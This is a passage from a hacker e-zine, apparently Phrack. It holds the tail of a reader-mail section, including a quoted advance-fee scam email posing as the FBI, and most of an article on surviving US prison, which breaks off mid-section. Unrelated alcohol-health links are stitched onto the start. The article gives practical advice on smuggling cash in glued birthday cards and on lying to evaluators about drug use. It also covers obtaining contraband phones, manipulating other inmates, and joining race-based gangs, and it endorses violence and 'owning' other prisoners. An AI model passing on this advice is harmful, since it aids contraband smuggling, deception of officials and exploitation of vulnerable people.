Effects of Drinking Alcohol: Health Benefits vs. Risks  
www.webmd.com/cancer/features/faq-alcohol-and-your-health   

Drinking alcohol\227Consumer Reports Health 
www.consumerreports.org/health/conditions-and-treatments/
the-risks-and-benefits-of-drinking-alcohol/overview/index.htm  

----

Getting drunken doesnt pown it is a fault of your own^^ 
Peace Phrack! 

    [ Fair enough ;> ]


|--=[ 0x07 - Insane delay ]=---------------------------------------------=|

Subject: a question                        <-- Needs ANTISPAM in Subject!
From: XXXXXXXXXXX
To: kleene@phrack.org, pwned@phrack.org    <-- Wrong address man!

Hi,
What's the real sake of this delay, working on scada systems to attack 
iran?

    [ AHAH. Stuxnet developers if you ever read that, do not forget to 
      submit a paper on SCADA hacking for p68. ]


|--=[ 0x08 - Friendly messages ]=----------------------------------------=|

From: Cristi T.
Subject: hey

hey phrack, 

    [ Hi. ]

don't die.. i hope u will deliver this issue.   

    [ Actually we're not dead. If we were then who would be writing this? 
      ;) ]

Best wishes,
Cristi

    [ Thx Cristi :) ]

                                    ---

From: ZZZ
Subject:

Hi, 

I noticed that you guys have a lot of followers who are neophytes to 
hacking. If you would like an article or two on the very basics of 
footprinting, scanning, enumeration, or hacking I might be able to do some  
for you guys. I am an IT professional and educator. At least if my content 
is or newbies, it will be well written. Just let me know.   

    [ Hi. Sorry man. Wrong e-zine, consider asking Uninformed instead ;> ]

ZZZ
AKA W88ExitUS   

Sent from my iPhone 

    [ When did the times changed that much? :( ]

                                    ---

From: Christophe X
Subject: WTH ???

Hi guys,

I'm dying hoping to see the next number of phrack ... when would be the 67 
birth. Seriously, i don't think i have the skill for proposing sexy 
materials, but i'm serious enough for proposing you help for collecting / 
guiding authors. Let me know if you need help for rereading article. I'm 
french linux trainer, phrack was always my best emag, can't support to wait
for an annual release.

Best regards.

    [ You're always welcome to motivate potential writers. That itself is
      really helping. Thx. ]

                                    ---

From: rawhazard
Subject: ...bout issue #67

Hey men, just writing to know...what bout the issue #67? waiting for that 
since lots of time, u goin to "push the beast out"? or you won't no more? 
Lemme know, thanks  
gw

    [ Well as you can see, we did. ]

                                    ---

From: f6174179c90c0366@gmx.com  
Subject: ANTISPAM

Thank you for maintaining phrack.

    [ You're very welcome bro. ]

|--=[ 0x09 - Busted??? ]=------------------------------------------------=|

From: "Robert S. Mueller" <crimecenter@fbi.gov>
Subject: Federal Bureau Of Investigation./Anti-Terrorist And Monitory Crime
Division.   

    [ Wait. How did you find us? ] 

Federal Bureau of Investigation (FBI)   
Anti-Terrorist And Monitory Crime Division. 
Federal Bureau Of Investigation.
J.Edgar.Hoover Building Washington Dc   
Customers Service Hours / Monday To Saturday
Office Hours Monday To Saturday:

Dear Beneficiary,   

Series of meetings have been held over the past 7 months with the secretary
general of the United Nations Organization. This ended 3 days ago. It is 
obvious that you have not received your fund which is to the tune of 
$850,000.00 due to past corrupt Governmental Officials who almost held the 
fund to themselves for their selfish reason and some individuals who have 
taken advantage of your fund all in an attempt to swindle your fund which 
has led to so many losses from your end and unnecessary delay in the 
receipt of your fund.

[ ... ]

    [ Oh that's nice. With that much money, we'll be able to pay for the 
      hosting & the DNS for centuries ;) ] 

|--=[ 0x0A - Book propositions ]=----------------------------------------=|

Subject: ANTISPAM
From: scott

Hello, I have a proposition today.  

My request is to be listed under S2D316 as an author on your website: 
http://www.phrack.org/authors.html, with the explicit purpose of writing a 
novel. I will of course be mining my fellow authors' data, and thus would 
of course need their approval.   

    [ Hum. LOL ]

I will be writing a minimum two thousand pages, divided amongst seven 
chapters. 

    [ Two thousand is not enough. Consider asking us back with at least the
      double. ]

I will of course be releasing it under HTML format, and would like the 
ability to FTP my pages as I deem them worthy.   

    [ Of course. I'm afraid the sys admin is currently on holidays. He will
      not be able to setup the FTP :( ]

If the above terms are met, proceeds will be negotiated.

    [ I'm sorry. Who are you again? ]

The name of the story is:   


The Underground Myth
by
Scott X

    [ We already have an article with that name. I'm afraid we'll have to
      sue you. Our lawyer will contact you soon enough. ]


|--=[ 0x0B - Newbies ]=--------------------------------------------------=|

    [ Information was removed to protect the innocent :> ]

Subject: Neophyte's Guide   
From: NICKNAME

My mentor (X of #Y on freenode) had decided to write a
version 2 to his original Z Guide to the Underground. This   
guide lays out the framework for any neophytes looking to get into our  
world. It also lays out the the truth about white hats, black hats, 
and grey hats. As well as giving the basic's for anyone truly   
dedicated to learning.

    [ The truth? Sounds interesting :-P ]

I was inspired to write it after reading the article in phrack issue
65 entitled "the underground myth". Its so true, there are hardly any   
mentors out there that are actually reliable. Most are on some skiddie  
forum, and all they talk about is step by step SQL injections. And out  
dated RFI's.

    [ Yes. Step by step is annoying. ]

Due to this sickness infecting the web, we decided to write and 
publish this (for free of course). In the hops that it will steer the   
newbie's of the world away from GUI land, and back to our roots.

The book is 47 page's from start to finish. I believe that the  
information contained in said book is invaluable and would help a lot   
of people out.

    [ Invaluable? :) ]

I have been intrigued by almost every single issue of phrack. I know
typically Phrack puts up high level articles, but I have noticed that   
on occasion you guys will put something out there for the newbies, I
believe that this would be a very good addition to your awesome, and
inspiring publications. 

Thank you for your time and consideration of our book.  

NICKNAME

-EOF

    [ No problem Sam. Oh yes sometimes with PDF metadata you have that 
      kind of unfortunate leak ;> It would be wise to update your book :) ]


|--=[ EOF ]=-------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x05 of 0x10

|=-----------------------------------------------------------------------=|
|=---------------------=[ How to make it in Prison ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=----------------=[ by TAp - kill4deth <at> yahoo.com ]=----------------=|
|=--------=[ http://www.freewebs.com/hexdeth  / AIM : swp2388 ]=---------=|
|=-----------------------------------------------------------------------=|


                                  -------


  1 - Introduction
  
  2 - The beginning

    2.1 - Intake
    2.2 - Outline of the process

  3 - Fresh Meat

  4 - Life in prison 

    4.1 - What to expect and getting used to it
    4.2 - Mail & collect calls
    4.3 - Hygiene
    4.4 - How you will live and getting used to it
    4.5 - The commissary/snack cart
    4.6 - Making money

  5 - Interaction with other inmates

    5.1 - Getting checked
    5.2 - Just like momma used to make?
    5.3 - Getting punked/becoming a bitch

  6 - Prison gangs

    6.1 - Prison gangs
    6.2 - Should I join a gang, and if so which one should I join ?

  7 - County Jail Vs. State Prison
  
  8 - Common Situations

  9 - Staying mentally fit

  10 - Why I wrote this


                                  -------                                         



--[ 1 - Introduction


Alright people, this is a guide on what to do and how to act if you find 
yourself in a prison environment. Let's all face it, if you're into the 
underground world of hacking or phreaking then you've a very good chance 
of being arrested some day. Seeing as how I've been in this situation 
before, and also having noticed the amount of files on laws and police, 
I've decided to write a file that has information you could use to make 
your time a lot easier if you happen to go into prison. I myself seriously 
hope you would never have to use this in a real life situation but if you 
do, use it to your advantage. So to the point... 

In this file we will be talking about a lot of different techniques and 
also about things you should and should not do... This is in no way an 
exactly fool proof text. All information is based on how I, the author, 
interpreted the actions of others. Also note that this file is based 
souly on the American prison systems. Therefore if you are reading this 
file and are not living in America, some given information will be wrong 
and some steps of the process may not be in order or even exist at all.


--[ 2 - The beginning


OK due to the aspects of confusion, there will be some vocabulary that's 
common to the American Prison facilities in this file. In America there are 
thousands of 'slang' words that prisoners use to help hide or mask the 
activities from other inmates and/or the prison officials. We'll start at 
the beginning stage called the 'intake process'.


--[ 2.1 - Intake            
                         

The 'intake' part of the process is the very first part. In this process 
you will most likely have your constitutional rights (if you're American) 
read to you and if they fail to do this then you will most likely have all 
changes dropped/cleared. After this is done, you will be formally charged 
with what ever crime you are being accused of, then you will have your 
fingerprints and a mug shot (picture) of you taken. You will be moved into
a room either with other 'offenders/inmates' (these are the people who have
also committed crimes and awaiting trial) or by yourself depending on how 
many people are being 'processed'. In this room there will be guards there
to take pictures of any and all tattoos and scares. These will be used to 
help identify you in case you escape or try to give a fake identification 
in the future.

In this part of the process you will be completely naked, so if you're 
scared to show your body then too bad get over it or risk being restrained 
and having them undress you. Next you will take showers with (pubic) lice 
shampoo. Depending on the setup of the building you will either get to 
shower by yourself or with a group of inmates. After the shower you will be
given a set of pants and a shirt. Some prisons do not provide underwear or 
cotton shirts you will have to buy these if they are available. Next you 
will be taken to your 'holding cell' a temporary housing until they either 
issue you a more permanent cell or until they get more room for you. Now 
you are ready for the main part of this text file


--[ 2.2 - Outline of the process


This part is mainly about the movements that go on and what to expect while
in transition. Some of the information applies to the American judicial 
system.


--[ 2.2.1 - The county jail


when you first get locked up they will most likely put you in what is 
called a 'county jail'. This type of jail is only for the people who live 
in your general vicinity and is the first part of the process. While you 
are heard you will either buy a lawyer or be appointed one. If you are 
appointed one you have a greater chance of going to prison. I would advise 
that you pay for one. While heard you will see your lawyer and he will set 
up the pre-trial date. At the pre-trial your lawyer will present motions on
your be-half (These will help you in your case so don't just sit around in 
there. Go to the law library and do some research.) but the prosecutor will
also have the opportunity to present motions that can hurt your case. From 
here the judge will decide what to accept and what is thrown out, he will 
also set your real trial date.


-[ 2.2.2 - The first day in prison


Your first day in prison will be at a diagnostics unit. This is where they 
do mental evaluations on all inmates to help them place you in the facility
to best fit your needs such as if you are handicapped then you will be 
placed with fellow peers. If you are a person who likes to get angry and 
assault people then you will got a place with idiots such as yourself.

During your stay at the diagnostics unit you will go there are tests 
regarding your mental stability and be questioned about your past. You will
also be asked about prior drug use. My advise to you would be to try look 
and act as normal as possible and to lie about any and all drug problems.
This will help make your time easier and keep you from doing stuff required
by the prisons to make parole such as a rehab/anger management program. 

After about 2 months, depending on your actions you will be sent to a more 
permanent placement which is a lot different. That is because most people 
were 'faking it to make it'. This means to act one way to get what you 
want. These people may have anger problems and all that but they pretended 
not to so they would get a better unit. Now once they get to that unit they
can go onto being there real self's. This can be frustrating to the people 
who are actually normal because now they have to put up with the people who
they didn't want to be around.

Note: You will notice that the guards on the transportation busses have 
shot guns. These are not for show if you attempt to escape they will shoot 
to kill.


--[ 3 - Fresh Meat


Fresh Meat - This is someone who has never been locked up, therefore you 
are the main person people will 'go after' which means attempt to cause you
harm or to manipulate you. Most likely these people will be the ones who 
have been locked up for several years or the people who make a habit out of
getting locked up. Yes some people spend most of their pathetic life in 
prison, even when they've had many chances given to them. 

Now you're either reading this for one of two reasons:
   1. You've never been locked up before,
   2. You've been locked up before and you want to see if this is a serious 
      file.

Well if you're reading this to find out whether I'm knowledgeable on this 
fact, then you might find something in here that could have or will help 
you in the future ;]. But if you're reading this file for the first reason 
then enjoy.

Now most of the time when someone new goes to prison he will be approached 
by fellow prisoners who will attempt to give him a 'heart check'. This is 
were the other prisoners get you to fight them. They do this to see if you 
are a good fighter or if you will simply let them assault you. Most of the
time the people trying to assault will be the same race as you and they may
ask you some questions to see if they can find out more information on you.
If they do this, you must fight them back. It doesn't matter whether you 
win or lose, remember they are there to see if you have heart (courage). 
For them people who fight to protect themselves or their property have 
'heart' and in prison respect is all you have. No one can take it unless 
you let them (and they will try).


--[ 4 - Life in prison


--[ 4.1 - What to expect and getting used to it


Now when you get to your facility please do not expect people to care if 
you want to go home, when your used to eat, what you like to eat, or if 
your bed is too thin and hard on your back... NO ONE GIVES A FUCK, not the 
inmates, not the guards, and not the nurse.
                                                                        
You will most likely eat breakfast early in the morning. Here (America 
Texas) it is at 3:00am then lunch is at 9:00am and dinner at 4-5pm. Do not 
expect a snack in between because there will not be any, not even if you're
"Starving to death". Yes this is your first time being locked up and most 
likely you will be a short timer (someone with less than 5 years, some 
people refer to short timers as 'having less then 20 years'...). Yes you 
will be there with people who have life without parole. Therefore you 
should not complain about how much time you have or how you want to go home
because this can cause problems with the other inmates who have been in 
prison for a while and most likely will not be getting out soon. Inmates 
with a lot of time take this so seriously they will fight you if they hear 
you complain about your situation. Remember, there will always be people 
with more problems than you.


--[ 4.2 - Mail & collect calls                          


You will most likely have the right to send/receive letters from family and 
friends. There will most likely be limits on the amount you can send out 
for a certain amount of time depending on where you live. You may also be 
expected to provide the pen/paper/envelopes/stamps. 

There may also be payphones (good luck to all the phreakers) depending on 
your location. If you are lucky enough to be in a prison with working 
phones you may notice that you will have to place collect calls. However 
this type of calls will not establish a connection with a cellphone unless 
the receiving party has set up an account with the phone company. 

Also not all land lines will accept a collect call. Depending on the phone 
company the prison uses you may be able to set up a prepaid account that 
your family will provide money to. If you are using this type of account 
with the phone company then you will be able to call any land-line/
cellphone.

Now that you know the basics about the mail/phone set up we're going to 
talk about what you should not do regarding these systems. If for some 
reason you are not receiving your mail, make sure you are not giving it to 
the guard who may have reason to not turn it into the mail office/postal 
services. They may work for the prisons but there are some who are just as 
corrupt as your fellow prisoners. If you are certain this is not happening 
then there may be a problem with the postal services, sadly you will not be
able to find this out. Lastly and most likely your loved ones just simply 
did not write you back. There is really only one main reason that you can 
not get through on your phone calls and that would be the person you are 
calling does not want to talk to you. If this is so, do not complain to 
your fellow inmates they do not care like I said before. The reason I tell 
you this is because there are some people who do not receive letters/calls 
and it's simply rude to complain in front of these people (its also bad for
your health).

Another thing is that there are some people who will try to manipulate you 
into giving them a phone call or try to get you to give them your pin #. 
You'll know what I mean and be able to resist this if you have some 
experience in social engineering. Your best bet would be to keep your pin #
for yourself and if you give someone a phone call make them give you 
something of theirs. Also you can use your knowledge of SE to exploit your 
fellow inmates to make your free calls, once again good luck with your 
techniques :)

Note: Phone calls and mails will be monitored by the prison officials so be
careful of what you say.


--[ 4.3 - Hygiene  


Right if you really need me to explain this to you then there's something 
wrong, but to all the people who need it...

Depending on your location you may or may not be given hygiene (deodorant /
soap / shampoo ... you know the main shit). If this is not given to
you then you will need to find a way to get these items because you don't 
want to walk around looking/smelling like a homeless bum because this seems
to upset the inmates also the average person, no one wants to smell you. I 
would also recommend that you take a shower as often as you can. In some 
prisons you may only shower once a week, maybe longer, this is why the 
deodorant is so important because it will help make you smell better or 
'seem cleaner'.


--[ 4.4 - How you will live and getting used to it                                        


Now you're going to be in prison and you will be living there for the time 
being. No one in their right minds will like living there and most of the 
time the guards don't even want to be there. Noting this you will be issued
a bed (this is not a real bed, its more like a shower certain stuffed with 
wall insulation). They're not very thick (most of the ones I've seen are 
about three inches thick) and as you might think they are not in the least 
bit comfortable. No one is going to care if your back hurts or you cant 
sleep, you will just have to get used to it. You will not be issued 
sleeping medication or pain relievers, due to the illegal pill trade inside
the prisons. In your cell you may or may not have a toilet. These will be 
stainless steal, you may have seen some in a prison movie, and most likely 
have a sink at the top. Don't worry the water does not recycle.

So if you are shy (note: you will also be present in front of female 
guards, this may cause you to be more uncomfortable than you already are 
unless you get amusement from shifting in front of them) then you're going 
to have to get over this quickly or walk around holding your piss and 
having a stomach full of shit. When you're done doing your bathroom 
business make sure you cleaned the area you've used (only the sink/toilet 
seat, the rest doesn't matter unless you're clumsy and pissed on the floor 
or dropped something). 

This is to show respect for yourself and the others around you so please be
sure to clean up after yourself. This type of cleanliness also applies to 
your room/cell/living area. You should observe good cleaning habits to make
sure your room is not a mess or does not smell bad. The main reason is that
if a guard sees a room that is in a mess then they're most likely to search
the room (these are called 'shake downs') and if you are the cause of these
shake downs then your fellow peers will 'check' you. 


--[ 4.5 - The commissary/snack cart


In prison there is a thing called commissary (it's like a store in prison).
With this you can buy food such as candy, chips, cokes and lots of other 
things that are way better than what they give you from the cafeteria. The 
problem is that you will have to buy these items with your own money. This 
will have to be sent to you from the outside world, basically your family /
friends will have to do this. You can't just come across some real money 
and hand it to them they wont take it. They will tell you about the process
more when you get there. You are issued an account number and the money 
will be located there. You will also be able to buy your hygiene / letter 
writing materials here. Make sure you buy the things you need before you 
buy the things you want.

Note 1: people may try to manipulate you into buying items for them. Please
do not be easily manipulated only buy things for the people you trust and 
make sure they pay you back or give you something in return for what you 
gave them.

Note 2: you may also try to SE people into buying stuff for you but be 
smart about this because people do not like when they find out you 
manipulated them.


--[ 4.6 - Making money
                                                     

Yes it is possible to make 'money'. The term money is not only used for 
legal currency but also commissary / tobacco / stamp/other materials. These
are worth the same amount as they are when you buy them from the commissary 
people and tobacco will be worth more if it is not sold by the commissary.
Now once you buy your materials you have either the choice to keep them or 
use them to buy illegal goods that are rampant inside the prisons across 
the world. There will always be someone who can be corrupted or extorted 
into doing your bidding (bringing in certain items you could not get with 
out an outside source, this is called contraband). Now you'll use your 
legal goods to buy this contraband from the more experienced inmates, there
will be all kinds of contraband to choose from and they are not cheap. Here
is a nice list of a few things that may be available to you: 

1. Most drugs, i.e. cocaine, heroine, methamphetamine, crack, also 
including prescription pills obtained by the inmates who take the 
medications. They do this by hiding the pills in their throat or they can
be brought in by a guard or through visitation.

2. Real currency. This will be obtained through the usual ways like the 
guards, visitation, and using the mail. Either the guard didn't check the
mail right or it was hidden inside a card. People use birthday cards to 
hide the money. The process is quite simple. Take a card that has a part 
where you can write extra stuff on then put the money between that part and
the back part of the card. Super glue it in a neat and undetectable 
fashion.

3. Tobacco. There are the normal channels but remember also that the inmate 
you're buying this stuff from might have had this in their anal cavity to 
hide it while being search. Lol that's why I never smoked unless I knew it 
wasn't stuck up an ass before.

4. Cell phones. These will be brought in by the guards 99% of the time and 
they will cost more than anything else you can buy. It has to be real 
currency (guards don't want food because they can get it themselves). They 
cost around 200 to 400 dollars and I've heard of people buying them for 
$1,000. It will be pre-paid and you should get a zip charger (about the 
size of a AA battery). Keep the phone on silent and only use it when you're
alone because if you are caught with a phone inside a prison you may be 
charged with another crime and sentenced to more time. When you run out of 
minutes you may have your family buy a refill card and activate it over the
Internet.

Note: Other inmates may ask to use your phone, charge them for this if you 
allow it.

My advice would be to hide it from everyone and not tell anybody since they
may try to use this against you and force u into doing something against 
your will. They'll threaten to tell on you or just do it to get back at you
for something.

Past events: The state of Texas has just recently cracked down on the 
illegal cell phone trade inside their prisons. They are currently 
installing cell phone jamming devices in all of there facilities, the 
reason for this is because an inmate on death row called a government 
official from his cell and threatened his family.

5. Tattoos/materials. You can also pay for getting some nice tattoos in 
prison, they are of high quality and cheaper than in the free world (not 
sure why though). You can just about get any type of tattoo you want as 
long as you're willing to pay for it. You can also sell the tattoo guns / 
ink if you know how to make it. The prices will be up to you and the basic 
rules of the prison environment.

6. Artwork. If you know how to draw you can draw up some samples and show 
them off and you will get some people who will want you to draw for them. 
Whether this is a card for their family or a tattoo design they plan on 
getting, the prices are up to you. The better the quality the higher the 
price you can request.

7. Weapons/shanks. These are home made knives that people will use to 
assault/kill others with. There are also tempered Styrofoam and news paper 
bats/poles and spears made out of news paper. These really have no set cost
just thought I'd give them a mention.

8. Other inmates. Yes there maybe inmates for sell. These you can buy to do
your bidding or just simply to have someone under your control you can 
basically do anything you want but my advise is to treat them nice and make
them think you're their friend or else they'll turn against you. Also be 
prepared to protect this person. If they see you're not helping them they 
are not going to help you. This may bring you more problems than what you 
want. The prices will be set by the person you're buying from. If you are 
caught buying/selling people you will be severely punished.

Note 1: These are all illegal products and most are punishable by law. You 
can receive extra time if you are caught buying/selling these items.

Note 2: You should really commit to using your SE skills with these 
activities to help you get more for less, just make sure not to get caught 
cheating people.


--[ 5 - Interaction with other inmates


--[ 5.1 - Getting checked 


Being 'checked' by someone is not a good thing at all. This means another 
inmate is telling you that you've fucked up or letting you know that you're
doing something wrong. A good example of being checked would be: 

You use the restroom and you forget to clean up after yourself. Another 
inmate that has been waiting for you to Finnish comes in and sees this. Now
he can't use the restroom until your mess is cleaned up but he's not going
to clean it himself. What he will do is go and find you and tell you to 'go
and clean your fucking mess up'. Now if you do clean it after the other 
inmate told you this in front of every one then you will be thought of as 
someone who can be pushed around and if you don't clean it you will have to
fight this inmate.

This is looked at as a bad thing because the other inmates may see this as 
you letting someone tell you what to do and then they'll try to do the 
same. This type of people who let the other inmates tell them what to 
do have the lowest rank in prison (right above snitches and sex offenders). 
I hope that none of you are sex offenders but if you are then you will get 
what you deserve when you get caught and this file will not help you in 
any way. So you should simply avoid this type of confrontation.

                                     
--[ 5.2 - Just like momma used to make?


In this section we'll be talking about the food you will be eating while 
you're locked up. This 'food' as they like to call it is not very good and 
you most likely won't be getting a lot of it (if you're the average man 
you're going to get to sleep hungry most nights). You'll start your day off
early in the morning (3:00am were I was at, this will mostly be true for 
you also because there will be a lot of people in the prison and they'll 
have to start early to get every thing done on time). Then there will be 
lunch at about 9:00am to 11:00am and finally you'll have your last meal 
somewhere around 5:00pm. 

Now that you have the basic meal schedule it's time to tell you what you're
most likely going to be eating. The main thing I've seen would be the soy 
bean patties (tofu I guess). This is not real meat nor will it taste as 
such. The reasons they give you are:

   1. It's cheap,
   2. It's low in fat. They have to keep you healthy even though they'll 
      feed you the minimum amount of calories that a human needs to stay 
      alive),
   3. It's high in protein. 

If you are not given soy bean then you will be given either 'pork' or 
turkey meat (this will mostly be the 'sausage' at breakfast or the patties 
for the hamburgers). The breads will almost all the time be wheat (you may 
like wheat bread but it gets really old after a while). Basically 
everything will be low fat. I'll recommend that even if you don't like it 
just eat it (mixing the food all together will help mask the taste). 

Basically there may be things that you can't eat without throwing up. You 
will get used to it the more you eat it but there will always be 'roaches'
(someone who looks for scraps/extra food that others did not eat...like a 
cockroach). These people will see that you did not eat all your food and 
ask you if they might have it. Depending on who they are and if you trust
them or not, it is up to you whether you give it to them or not. I would 
suggest you not to if you don't know them or if you think they're trying 
to manipulate you. Giving people stuff they want will not help you gain 
acceptance. They will continue to manipulate you if you allow it.


--[ 5.3 - Getting punked/becoming a bitch

 
Getting 'punked' is when you allow other inmates to treat you any way they 
want. This includes:

   1. Letting them assault you
   2. Letting them take your food/personal belongings
   3. Letting them verbally abuse you
   4. and sexual abuse

Becoming a 'bitch' means that you belong to another inmate. You'll be 
treated like a punk and/or be raped though they may protect you in return 
(they can't let other inmate fuck with their property now can they?). Don't
let this happen, if you think this may happen to you then stop reading the 
file, you'll be a disgrace to all the hackers and phreakers of the world. 

Note 1: an inmate may offer you protection from the other inmates. What 
they will not tell you is that you will be their bitch, and will do what 
they say or accept the beating you will get. Also if one day you no longer 
want the protection of the inmate then he and his friends will target you. 
You will still get beaten, so don't accept any 'protection'.

Note 2: You may notice that I degrade a few types of people in this file 
such as sex offenders and 'bitches'. When I use this word I mean the people
who can defend themselves but simply will not. There are people who will 
not fight for themselves but if someone tells them to fight another person 
then they will. This is pathetic and inexcusable, do not be like this.


--[ 6 - Prison gangs


--[ 6.1 - Overview


I will now try to explain the basic concepts of the main types of prison 
gangs. Please remember this will not always be true for all gangs or for 
prisons in other countries besides the USA. Some information may not be 
accurate therefore I will not use any names.

When you go in prison you may notice that groups of people with the same 
types of tattoos happen to congregate in groups (most of the time in the 
same areas). You may also notice that they will show favoritism to the 
group they associate with, this is most likely because they are in a 
'gang'. A gang is a group of 3 or more people that are involved in 
organized crime and believe in the same values/beliefs and share the same 
goals. For this reason these prisons have established what most call a 
'gang task force'. People assigned to the task force are responsible for 
finding out the illegal activities of these inmates....

Most of the gangs are based on race (White/European, 
Mexican/Latino/Hispanic, Black/African). Their common goals are to: 

   1. Protect each other. Have your fellow members backs don't let any one 
      walk over them or punk them. Most likely though there won't be any 
      punks in a gang (and if there are they will be ejected from the gang 
      or disaplin).

   2. Establish and keep the respect of their people. Once again don't
      allow people to push you around, if this is allowed then it will be 
      bad for their business/dealings.

   3. Make money. This has been explained to you already but what was not 
      explained earlier was that most of the people you will buy your 
      contraband from (drugs mainly) will be from one of these gangs. Gangs
      often got war over business related dealings. Most people assume it's
      inspired by racial issues but about 90% of the time its over the drug
      trade/territory.


--[ 6.2 - Should I join a gang, and if so which one should I join ?


My advise to you would be that you should not join a gang if you want to 
get out and go home on time. When you join a gang you are expected to put 
the gang and its members first. It doesn't matter if you think its the 
right thing to do. If they ask you to do something then you must do it or 
accept the punishment they will give you. If another member is with you and
instigating problems with other people and he gets attacked, it will be 
your job to help him. This means you could end up getting hurt or getting 
more time on your sentence (think about this for a minute you have 4 days 
until you're allowed to go home and then something happens where you have 
to help your gang... You end up getting more time and can't go home. How 
would your family feel, how would you feel ?).

Now if you are persistent about joining one, here are the main rules about 
this:

   1. You should join a gang based on the same race/ethnic group as you 
      are. 
   2. Make sure you understand and are willing to follow any and all rules 
      given to you.
   3. Do not try to manipulate your fellow members or cheat the gang out of 
      any money.
   4. Only do approved business with other gangs/people.
   5. Do not talk about your gang affiliation with any one (family/guards).
   6. Make sure you are willing to be in the gang for the rest of your 
      life, your affiliation does not stop when you are released (if 
      released), you will be responsible for contacting your local ranking 
      members of the gang when you get out.
   7. Most importantly do not join a gang if you have anyone you love or 
      care for. The simple reason for me saying this is that you may not 
      get out if you join a gang... You must follow any and all orders 
      including if they want you to kill someone (people have been ordered 
      to kill their own family members).

Note: Failure to do these things may cost you your life. You will also have
more rules to follow than expected when you join. These rule aren't known 
to people outside the gang therefore I've only listed the most common.


--[ 7 - County Jail Vs. State Prison


What? there is a difference you say? Yes, there a few of them in fact. 
Let's go over them.

                            -------------------

                                County cons

   1. You most likely won't move out of your cell.
   2. Time is harder and feels like it goes by a lot slower.
   3. Depending on how big it is, there's not as much food.
   4. It might be a lot more dirty and could smell like shit and piss.
   5. You will be in there with mentally ill people.
   6. Commissary costs more.

                                County pros

   1. You may get to see females and depending on the jail write them 
      (they'll be locked up too).
   2. You may get to have your own shower.
   3. You may not have to get up if you don't want to.
   4. You may not have a lights out time.
   5. Not every thing is gang related like prison and you can basically 
      chill with who ever you want (as far as race goes rivalries still 
      hold up).

                            -------------------

                                Prisons cons

   1. A lot of new rules you must learn and you might be expected to learn 
      without any help.
   2. The daily schedule will be a lot different than in county.
   3. Gang wars.
   4. Lock downs (no movement at all until told otherwise this can go on 
      for months).
   5. Work (you will have to work and you may not get paid for it... You 
      could work in the fields too and that sucks).
   6. Can't wright other people who are also locked up (this means the girl 
      you wrote in county wont be getting your letter).
   7. Mass butt naked searches. 
   8. Take showers in front of every one.

                                Prisons pros

   1. Time goes by a lot faster in county jail
   2. Easy to make money.
   3. Tattooing is more available.
   4. Cheaper commissary.
   5. Easier access to tobacco/drugs.
   6. A lot more respect than what there is in jail.


                            -------------------


--[ 8 - Common situations


Here we will talk about a few common (negative) situations presented to the
newer people of the prison world. In this section I'm going to tell you the
best ways to get out of them and I'll try to explain them in a way you can 
understand. Not all situations are listed in this section because no one 
can list them all but you can use what is here to help you 'free style' the
situation if one arises. Like I've said before you can use social 
engineering skills to help you get what you want or get out of almost 
anything that you can get yourself into. So lets get to it...

1. It's your first day on the unit (prison), people will be looking to see 
if they can make you there punk/bitch (remember that we've talked about 
this before). The most common way they will try this is using intimidation.
Most of the time a group of inmates will approach you and ask you seemingly
harmless questions but they're not. These questions can be used against 
you in some type of way (these people are not trying to be friendly, it may
seem this way but it's not). Few subjects you should not release any 
information about would be: 

  - Your family/personal life. Do not give your address or anything such as
    this out. The reason for this is to make it harder for them to know the
    people you may know.

  - Never lie about things you're not sure of. Just simply state that it's 
    your business and keep it as such. Also do not lie to try and gain 
    acceptance because it will not work. Keep your stories to yourself and 
    only tell them to trusted people.

2. You walk into the 'dayroom' (the place where everyone gathers to play 
games/watch tv/converse) and you see the people who entered your cell 
earlier playing a game of cards. You see that they are having a good amount
of fun and you need something to help take your mind off of your situation
or you just simply want to go over and make a few new friends. Well I'd 
recommend that you stay to yourself for a while longer and let the other 
inmates invite you to the game if they choose to do so. Still be cautious 
if they do as they might try to manipulate you for some reason.

Note: I'd also recommend that you do not just go up to people asking them 
questions or telling them your adventures from the free world. Being a 
friendly person is not looked at as a good thing while in prison.

The reason you should not just walk up to people and talk to them is
because some of them are mentally ill and may attack you if you attempt 
this. They will also try to make you think they are your friend and use you
for their amusement or personal gain. You should also never give out 
personal information to people you don't know because they may use that to 
help find victims when they are released. 

Note: If you want to make friends then my advice is to not lie to people 
show them you're trustworthy. If you're not a drug dealer then don't say 
you are. If you've never shot a gun don't say you have. And also don't 
overload them with technical talk, and don't get all excited to be talking 
to someone. They are not that cool plus it's annoying.

3. Someone disrespects you, either verbally or physically (pushing you or 
bumping into you). When this happens your safest bet would be to fight and 
not let this go on for very long because you will be seen as a bitch. Now 
if you are challenged to a fight then you should accept it and fight as 
good as you can. It won't really matter if you win or lose. If the inmates 
see you will fight then they will respect you.

Note: If a guard tells you to stop or hit the floor then you should do so 
to avoid being pepper sprayed or tazed. Some prisons are allowed to use 
deadly force.

4. Your friends or some other people ask you to join a gang. This is up to 
you. For help refer back to the gang section of the article.

5. You see something happening that you don't like, then your best response 
would be no response. If you get into someone else's business then it will 
only cause problems on yourself and you do not need any problems that can 
be avoided. If you choose to take action then that will be on you, I have 
warned you of doing so.

Note: This could result in retaliation from other inmates as well.

6. You're about to get out and you no longer want to be in the gang you 
joined when you first got locked up. Well there's a problem with this 
because one you were told it was for life and two they will most likely put
a contract on you (hire someone to kill you). To avoid being killed inside 
the prison walls you can use a technique. In prison they have a program 
called 'PC' (protective custody) this is for people with mental/physical 
illnesses and for the weaker prisoners. You will use this to your 
advantage, here is a good way to put yourself on PC:
 
Contact a ranking guard and let him know your situation. You will want to 
do this with a guard you trust so that he will not tell everyone of what 
you are planning to do. Sooner or later you will be taken to a one man cell
and you will be asked questions by the gang task force. You will be asked 
to give any and all information about the gang and if you don't help them 
then they will not help you.

Note 1: In my opinion if you use this part of the file you do not deserve 
to call yourself a man.

Note 2: These are the most common situations you may go through in prison 
but these are not definite. You may need to customize these techniques or 
apply them to different situations...


-[ 9 - Staying mentally Fit


In this part of the text we will be talking about the various techniques to
help you stay mentally fit. Basically what I'm talking about is how not to 
go crazy. Some people have the tendencies to over obsess about the outside 
world, or to think too much about their friends and family. This will cause
you to stress yourself out and become depressed. This leads to suicide in 
some people and this is what we want to avoid. So here are a few techniques
or suggestions that I'll give you to help keep you on top of things.

1. Some people put all their faith in getting letters and phone calls from 
their family/friends. This is not really a good thing. When you get a 
letter I would recommend reading it once and then replying to the letter as
soon as possible. Doing this will help you keep your mind off the free 
world. If you continually keep negative things on your mind/think about 
